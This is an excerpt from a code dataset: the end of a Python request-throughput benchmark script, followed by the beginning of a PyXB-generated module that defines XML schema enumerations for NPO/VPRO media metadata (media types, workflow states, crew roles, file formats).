dataset = sorted(dataset, key=lambda r: r[1])
baseline = dataset[-1][1]
print('\nResults:\n')
for i, (name, sec_per_req) in enumerate(dataset):
req_per_sec = round_to_int(Decimal(1) / sec_per_req)
us_per_req = (sec_per_req * Decimal(10 ** 6))
factor = round_to_int(baseline / sec_per_req)
print('{3}. {0:.<15s}{1:.>06,d} req/sec or {2: >3.2f} μs/req ({4}x)'.
format(name, req_per_sec, us_per_req, i + 1, factor))
if heapy and args.stat_memory:
print()
for name, _, heap_diff in datasets[0]:
title = 'Memory change induced by ' + name
print()
print('=' * len(title))
print(title)
print('=' * len(title))
print(heap_diff)
print()
| mit | 2,771,928,568,808,080,400 | 25.46 | 79 | 0.58715 | false |
npo-poms/pyapi | npoapi/xml/media.py | 1 | 640297 | # ./npoapi/xml/media.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:aaac8a39e00bcd1804b49bf5b5b8b83fb686b430
# Generated 2021-06-13 22:15:50.850058 by PyXB version 1.2.6 using Python 3.8.2.final.0
# Namespace urn:vpro:media:2009 [xmlns:media]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:23e5b8be-cc84-11eb-bb79-823829a95c05')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import pyxb.binding.xml_
import npoapi.xml.shared as _ImportedBinding_npoapi_xml_shared
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('urn:vpro:media:2009', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_shared = _ImportedBinding_npoapi_xml_shared.Namespace
_Namespace_shared.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {urn:vpro:media:2009}mediaTypeEnum
class mediaTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'mediaTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 118, 2)
_Documentation = None
mediaTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=mediaTypeEnum, enum_prefix=None)
mediaTypeEnum.MEDIA = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='MEDIA', tag='MEDIA')
mediaTypeEnum.GROUP = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='GROUP', tag='GROUP')
mediaTypeEnum.PROGRAM = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='PROGRAM', tag='PROGRAM')
mediaTypeEnum.SEGMENTTYPE = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEGMENTTYPE', tag='SEGMENTTYPE')
mediaTypeEnum.STRAND = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
mediaTypeEnum.ALBUM = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='ALBUM', tag='ALBUM')
mediaTypeEnum.PLAYLIST = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='PLAYLIST', tag='PLAYLIST')
mediaTypeEnum.ARCHIVE = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='ARCHIVE', tag='ARCHIVE')
mediaTypeEnum.SEASON = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEASON', tag='SEASON')
mediaTypeEnum.SERIES = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SERIES', tag='SERIES')
mediaTypeEnum.UMBRELLA = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='UMBRELLA', tag='UMBRELLA')
mediaTypeEnum.BROADCAST = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='BROADCAST', tag='BROADCAST')
mediaTypeEnum.MOVIE = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='MOVIE', tag='MOVIE')
mediaTypeEnum.TRAILER = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRAILER', tag='TRAILER')
mediaTypeEnum.CLIP = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='CLIP', tag='CLIP')
mediaTypeEnum.TRACK = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRACK', tag='TRACK')
mediaTypeEnum.SEGMENT = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEGMENT', tag='SEGMENT')
mediaTypeEnum.VISUALRADIO = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIO', tag='VISUALRADIO')
mediaTypeEnum.VISUALRADIOSEGMENT = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIOSEGMENT', tag='VISUALRADIOSEGMENT')
mediaTypeEnum.PROMO = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='PROMO', tag='PROMO')
mediaTypeEnum.RECORDING = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='RECORDING', tag='RECORDING')
mediaTypeEnum.COLLECTION = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='COLLECTION', tag='COLLECTION')
mediaTypeEnum._InitializeFacetMap(mediaTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'mediaTypeEnum', mediaTypeEnum)
_module_typeBindings.mediaTypeEnum = mediaTypeEnum
# Atomic simple type: {urn:vpro:media:2009}groupTypeEnum
class groupTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'groupTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 173, 2)
_Documentation = None
groupTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=groupTypeEnum, enum_prefix=None)
groupTypeEnum.STRAND = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
groupTypeEnum.ALBUM = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='ALBUM', tag='ALBUM')
groupTypeEnum.PLAYLIST = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='PLAYLIST', tag='PLAYLIST')
groupTypeEnum.ARCHIVE = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='ARCHIVE', tag='ARCHIVE')
groupTypeEnum.COLLECTION = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='COLLECTION', tag='COLLECTION')
groupTypeEnum.SEASON = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEASON', tag='SEASON')
groupTypeEnum.SERIES = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='SERIES', tag='SERIES')
groupTypeEnum.UMBRELLA = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='UMBRELLA', tag='UMBRELLA')
groupTypeEnum._InitializeFacetMap(groupTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'groupTypeEnum', groupTypeEnum)
_module_typeBindings.groupTypeEnum = groupTypeEnum
# Atomic simple type: {urn:vpro:media:2009}programTypeEnum
class programTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'programTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 186, 2)
_Documentation = None
programTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=programTypeEnum, enum_prefix=None)
programTypeEnum.BROADCAST = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='BROADCAST', tag='BROADCAST')
programTypeEnum.MOVIE = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='MOVIE', tag='MOVIE')
programTypeEnum.TRAILER = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRAILER', tag='TRAILER')
programTypeEnum.CLIP = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='CLIP', tag='CLIP')
programTypeEnum.STRAND = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
programTypeEnum.TRACK = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRACK', tag='TRACK')
programTypeEnum.VISUALRADIO = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIO', tag='VISUALRADIO')
programTypeEnum.PROMO = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='PROMO', tag='PROMO')
programTypeEnum.RECORDING = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='RECORDING', tag='RECORDING')
programTypeEnum._InitializeFacetMap(programTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'programTypeEnum', programTypeEnum)
_module_typeBindings.programTypeEnum = programTypeEnum
# Atomic simple type: {urn:vpro:media:2009}segmentTypeEnum
class segmentTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'segmentTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 200, 2)
_Documentation = None
segmentTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=segmentTypeEnum, enum_prefix=None)
segmentTypeEnum.SEGMENT = segmentTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEGMENT', tag='SEGMENT')
segmentTypeEnum.VISUALRADIOSEGMENT = segmentTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIOSEGMENT', tag='VISUALRADIOSEGMENT')
segmentTypeEnum._InitializeFacetMap(segmentTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'segmentTypeEnum', segmentTypeEnum)
_module_typeBindings.segmentTypeEnum = segmentTypeEnum
# Atomic simple type: {urn:vpro:media:2009}workflowTypeEnum
class workflowTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'workflowTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 207, 2)
_Documentation = None
workflowTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=workflowTypeEnum, enum_prefix=None)
workflowTypeEnum.PUBLISHED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='PUBLISHED', tag='PUBLISHED')
workflowTypeEnum.REVOKED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='REVOKED', tag='REVOKED')
workflowTypeEnum.FOR_REPUBLICATION = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='FOR REPUBLICATION', tag='FOR_REPUBLICATION')
workflowTypeEnum.FOR_PUBLICATION = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='FOR PUBLICATION', tag='FOR_PUBLICATION')
workflowTypeEnum.DELETED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='DELETED', tag='DELETED')
workflowTypeEnum.PARENT_REVOKED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='PARENT REVOKED', tag='PARENT_REVOKED')
workflowTypeEnum._InitializeFacetMap(workflowTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'workflowTypeEnum', workflowTypeEnum)
_module_typeBindings.workflowTypeEnum = workflowTypeEnum
# Atomic simple type: {urn:vpro:media:2009}cridType
class cridType (pyxb.binding.datatypes.anyURI):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'cridType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 349, 2)
_Documentation = None
cridType._CF_pattern = pyxb.binding.facets.CF_pattern()
cridType._CF_pattern.addPattern(pattern='(c|C)(r|R)(i|I)(d|D)://.*/.*')
cridType._InitializeFacetMap(cridType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'cridType', cridType)
_module_typeBindings.cridType = cridType
# Atomic simple type: {urn:vpro:media:2009}platformTypeEnum
class platformTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'platformTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 355, 2)
_Documentation = None
platformTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=platformTypeEnum, enum_prefix=None)
platformTypeEnum.INTERNETVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='INTERNETVOD', tag='INTERNETVOD')
platformTypeEnum.TVVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='TVVOD', tag='TVVOD')
platformTypeEnum.PLUSVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='PLUSVOD', tag='PLUSVOD')
platformTypeEnum.NPOPLUSVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='NPOPLUSVOD', tag='NPOPLUSVOD')
platformTypeEnum._InitializeFacetMap(platformTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'platformTypeEnum', platformTypeEnum)
_module_typeBindings.platformTypeEnum = platformTypeEnum
# Atomic simple type: {urn:vpro:media:2009}textualTypeEnum
class textualTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'textualTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 393, 2)
_Documentation = None
textualTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=textualTypeEnum, enum_prefix=None)
textualTypeEnum.MAIN = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='MAIN', tag='MAIN')
textualTypeEnum.LONG = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='LONG', tag='LONG')
textualTypeEnum.SHORT = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='SHORT', tag='SHORT')
textualTypeEnum.SUB = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='SUB', tag='SUB')
textualTypeEnum.KICKER = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='KICKER', tag='KICKER')
textualTypeEnum.ORIGINAL = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='ORIGINAL', tag='ORIGINAL')
textualTypeEnum.EPISODE = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='EPISODE', tag='EPISODE')
textualTypeEnum.WORK = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='WORK', tag='WORK')
textualTypeEnum.LEXICO = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='LEXICO', tag='LEXICO')
textualTypeEnum.ABBREVIATION = textualTypeEnum._CF_enumeration.addEnumeration(unicode_value='ABBREVIATION', tag='ABBREVIATION')
textualTypeEnum._InitializeFacetMap(textualTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'textualTypeEnum', textualTypeEnum)
_module_typeBindings.textualTypeEnum = textualTypeEnum
# Atomic simple type: {urn:vpro:media:2009}intentionEnum
class intentionEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'intentionEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 408, 2)
_Documentation = None
intentionEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=intentionEnum, enum_prefix=None)
intentionEnum.INFORM = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM', tag='INFORM')
intentionEnum.INFORM_NEWS_AND_FACTS = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM_NEWS_AND_FACTS', tag='INFORM_NEWS_AND_FACTS')
intentionEnum.INFORM_INDEPTH = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM_INDEPTH', tag='INFORM_INDEPTH')
intentionEnum.INFORM_GENERAL = intentionEnum._CF_enumeration.addEnumeration(unicode_value='INFORM_GENERAL', tag='INFORM_GENERAL')
intentionEnum.ENTERTAINMENT = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ENTERTAINMENT', tag='ENTERTAINMENT')
intentionEnum.ENTERTAINMENT_LEASURE = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ENTERTAINMENT_LEASURE', tag='ENTERTAINMENT_LEASURE')
intentionEnum.ENTERTAINMENT_INFORMATIVE = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ENTERTAINMENT_INFORMATIVE', tag='ENTERTAINMENT_INFORMATIVE')
intentionEnum.ACTIVATING = intentionEnum._CF_enumeration.addEnumeration(unicode_value='ACTIVATING', tag='ACTIVATING')
intentionEnum._InitializeFacetMap(intentionEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'intentionEnum', intentionEnum)
_module_typeBindings.intentionEnum = intentionEnum
# Atomic simple type: {urn:vpro:media:2009}targetGroupEnum
class targetGroupEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'targetGroupEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 421, 2)
_Documentation = None
targetGroupEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=targetGroupEnum, enum_prefix=None)
targetGroupEnum.KIDS_6 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='KIDS_6', tag='KIDS_6')
targetGroupEnum.KIDS_12 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='KIDS_12', tag='KIDS_12')
targetGroupEnum.YOUNG_ADULTS = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='YOUNG_ADULTS', tag='YOUNG_ADULTS')
targetGroupEnum.ADULTS = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='ADULTS', tag='ADULTS')
targetGroupEnum.ADULTS_WITH_KIDS_6 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='ADULTS_WITH_KIDS_6', tag='ADULTS_WITH_KIDS_6')
targetGroupEnum.ADULTS_WITH_KIDS_12 = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='ADULTS_WITH_KIDS_12', tag='ADULTS_WITH_KIDS_12')
targetGroupEnum.EVERYONE = targetGroupEnum._CF_enumeration.addEnumeration(unicode_value='EVERYONE', tag='EVERYONE')
targetGroupEnum._InitializeFacetMap(targetGroupEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'targetGroupEnum', targetGroupEnum)
_module_typeBindings.targetGroupEnum = targetGroupEnum
# Atomic simple type: {urn:vpro:media:2009}avTypeEnum
class avTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'avTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 433, 2)
_Documentation = None
avTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=avTypeEnum, enum_prefix=None)
avTypeEnum.AUDIO = avTypeEnum._CF_enumeration.addEnumeration(unicode_value='AUDIO', tag='AUDIO')
avTypeEnum.VIDEO = avTypeEnum._CF_enumeration.addEnumeration(unicode_value='VIDEO', tag='VIDEO')
avTypeEnum.MIXED = avTypeEnum._CF_enumeration.addEnumeration(unicode_value='MIXED', tag='MIXED')
avTypeEnum._InitializeFacetMap(avTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'avTypeEnum', avTypeEnum)
_module_typeBindings.avTypeEnum = avTypeEnum
# Atomic simple type: {urn:vpro:media:2009}avFileFormatEnum
class avFileFormatEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'avFileFormatEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 479, 2)
_Documentation = None
avFileFormatEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=avFileFormatEnum, enum_prefix=None)
avFileFormatEnum.MP3 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='MP3', tag='MP3')
avFileFormatEnum.RA = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='RA', tag='RA')
avFileFormatEnum.RM = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='RM', tag='RM')
avFileFormatEnum.MP4 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='MP4', tag='MP4')
avFileFormatEnum.WVC1 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='WVC1', tag='WVC1')
avFileFormatEnum.WM = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='WM', tag='WM')
avFileFormatEnum.RAM = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='RAM', tag='RAM')
avFileFormatEnum.WMP = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='WMP', tag='WMP')
avFileFormatEnum.HTML = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='HTML', tag='HTML')
avFileFormatEnum.M4A = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='M4A', tag='M4A')
avFileFormatEnum.M4V = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='M4V', tag='M4V')
avFileFormatEnum.DGPP = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='DGPP', tag='DGPP')
avFileFormatEnum.FLV = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='FLV', tag='FLV')
avFileFormatEnum.HASP = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='HASP', tag='HASP')
avFileFormatEnum.MPEG2 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='MPEG2', tag='MPEG2')
avFileFormatEnum.H264 = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='H264', tag='H264')
avFileFormatEnum.UNKNOWN = avFileFormatEnum._CF_enumeration.addEnumeration(unicode_value='UNKNOWN', tag='UNKNOWN')
avFileFormatEnum._InitializeFacetMap(avFileFormatEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'avFileFormatEnum', avFileFormatEnum)
_module_typeBindings.avFileFormatEnum = avFileFormatEnum
# Atomic simple type: {urn:vpro:media:2009}colorType
class colorType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'colorType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 518, 2)
_Documentation = None
colorType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=colorType, enum_prefix=None)
colorType.COLOR = colorType._CF_enumeration.addEnumeration(unicode_value='COLOR', tag='COLOR')
colorType.BLACK_AND_WHITE = colorType._CF_enumeration.addEnumeration(unicode_value='BLACK AND WHITE', tag='BLACK_AND_WHITE')
colorType.BLACK_AND_WHITE_AND_COLOR = colorType._CF_enumeration.addEnumeration(unicode_value='BLACK AND WHITE AND COLOR', tag='BLACK_AND_WHITE_AND_COLOR')
colorType.COLORIZED = colorType._CF_enumeration.addEnumeration(unicode_value='COLORIZED', tag='COLORIZED')
colorType._InitializeFacetMap(colorType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'colorType', colorType)
_module_typeBindings.colorType = colorType
# Atomic simple type: {urn:vpro:media:2009}aspectRatioEnum
class aspectRatioEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'aspectRatioEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 527, 2)
_Documentation = None
aspectRatioEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=aspectRatioEnum, enum_prefix=None)
aspectRatioEnum.n43 = aspectRatioEnum._CF_enumeration.addEnumeration(unicode_value='4:3', tag='n43')
aspectRatioEnum.n169 = aspectRatioEnum._CF_enumeration.addEnumeration(unicode_value='16:9', tag='n169')
aspectRatioEnum._InitializeFacetMap(aspectRatioEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'aspectRatioEnum', aspectRatioEnum)
_module_typeBindings.aspectRatioEnum = aspectRatioEnum
# Atomic simple type: {urn:vpro:media:2009}roleType
class roleType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'roleType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 571, 2)
_Documentation = None
roleType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=roleType, enum_prefix=None)
roleType.DIRECTOR = roleType._CF_enumeration.addEnumeration(unicode_value='DIRECTOR', tag='DIRECTOR')
roleType.CHIEF_EDITOR = roleType._CF_enumeration.addEnumeration(unicode_value='CHIEF_EDITOR', tag='CHIEF_EDITOR')
roleType.EDITOR = roleType._CF_enumeration.addEnumeration(unicode_value='EDITOR', tag='EDITOR')
roleType.PRESENTER = roleType._CF_enumeration.addEnumeration(unicode_value='PRESENTER', tag='PRESENTER')
roleType.INTERVIEWER = roleType._CF_enumeration.addEnumeration(unicode_value='INTERVIEWER', tag='INTERVIEWER')
roleType.PRODUCER = roleType._CF_enumeration.addEnumeration(unicode_value='PRODUCER', tag='PRODUCER')
roleType.RESEARCH = roleType._CF_enumeration.addEnumeration(unicode_value='RESEARCH', tag='RESEARCH')
roleType.GUEST = roleType._CF_enumeration.addEnumeration(unicode_value='GUEST', tag='GUEST')
roleType.REPORTER = roleType._CF_enumeration.addEnumeration(unicode_value='REPORTER', tag='REPORTER')
roleType.ACTOR = roleType._CF_enumeration.addEnumeration(unicode_value='ACTOR', tag='ACTOR')
roleType.COMMENTATOR = roleType._CF_enumeration.addEnumeration(unicode_value='COMMENTATOR', tag='COMMENTATOR')
roleType.SCRIPTWRITER = roleType._CF_enumeration.addEnumeration(unicode_value='SCRIPTWRITER', tag='SCRIPTWRITER')
roleType.COMPOSER = roleType._CF_enumeration.addEnumeration(unicode_value='COMPOSER', tag='COMPOSER')
roleType.SUBJECT = roleType._CF_enumeration.addEnumeration(unicode_value='SUBJECT', tag='SUBJECT')
roleType.PARTICIPANT = roleType._CF_enumeration.addEnumeration(unicode_value='PARTICIPANT', tag='PARTICIPANT')
roleType.SIDEKICK = roleType._CF_enumeration.addEnumeration(unicode_value='SIDEKICK', tag='SIDEKICK')
roleType.NEWS_PRESENTER = roleType._CF_enumeration.addEnumeration(unicode_value='NEWS_PRESENTER', tag='NEWS_PRESENTER')
roleType.ASSISTANT_DIRECTOR = roleType._CF_enumeration.addEnumeration(unicode_value='ASSISTANT_DIRECTOR', tag='ASSISTANT_DIRECTOR')
roleType.CAMERA = roleType._CF_enumeration.addEnumeration(unicode_value='CAMERA', tag='CAMERA')
roleType.CHOREOGRAPHY = roleType._CF_enumeration.addEnumeration(unicode_value='CHOREOGRAPHY', tag='CHOREOGRAPHY')
roleType.DUBBING = roleType._CF_enumeration.addEnumeration(unicode_value='DUBBING', tag='DUBBING')
roleType.MAKEUP = roleType._CF_enumeration.addEnumeration(unicode_value='MAKEUP', tag='MAKEUP')
roleType.PRODUCTION_MANAGEMENT = roleType._CF_enumeration.addEnumeration(unicode_value='PRODUCTION_MANAGEMENT', tag='PRODUCTION_MANAGEMENT')
